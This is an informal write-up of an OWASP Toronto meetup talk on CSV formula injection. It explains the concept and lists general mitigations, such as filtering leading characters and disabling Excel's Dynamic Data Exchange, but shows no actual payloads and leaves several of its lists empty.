OWASP Toronto Chapter - July Meetup

OWASP Toronto

Introduction

OWASP Toronto Chapter hosted an event that was sponsored by a couple employees at Security Compass. Adam Greenhill presentation on Export to RCE gives a basic introduction to data within CSV files.

Who is OWASP?

Before we dive into the the write-up, for those who don’t know what OWASP is, OWASP (The Open Web Applicaiton Security Project) is a community based not-for-profit charitable organization focused on improving the security of web applications. OWASP’s core principles is that all material be freely available and accessible to the public - making it possible for anyone to enhance their own web application security. OWASP is best-known for their OWASP Top 10 most critical security risks.

OWASP Toronto Banner

Overview

Adam is a Senior Security Consultant at Security Compass. His talk focuses on CSV injection, and will touch on all aspects of the vulnerability (how it works, how to mitigate it, and a quick demo).

OWASP Toronto Banner

What is CSV?

CSV (Comma Separted Values) is file format used to store tabular data. such as a spreadsheet or database. CSV formatted files can be imported and exported from programs; the most commonly known and used one is Microsoft Excel.

OWASP Toronto Banner

So, what is CSV Injection?

According to OWASP, CSV Injection, also known as as formula injection, occurs when a websites embed untrusted input inside CSV files.

OWASP Toronto Banner

Basically, when a spreadsheet program like Microsoft Excel is used to open a CSV file, any cells starting with a ‘=’ will be interpreted by the software as a formula.

Using craft formulas can be used for three key attacks:

Common web apps that utilize CSV files

There are three common web applications that heavily use CSV files:

OWASP Toronto Banner

Ensuring you stay safe, make sure to verify that the CSV files you donwload from these common websites are verified and safe to download.

Mitigating CSV Injection

To remediate the attack, ensure that the cells in the CSV file do not begin with any of the following characters:

OWASP Toronto Banner

Increase Excel security

OWASP Toronto Banner

To further increase the security of Excel, disabling Dynamic Data Exchange are intended to help protect users form attacks who utilize DDE to spread malware.

TLDR

  1. Understand the technologies that you’re working with
  2. Sanitize your inputs
  3. Sanitize your outputs
  4. If you’re not using it disable it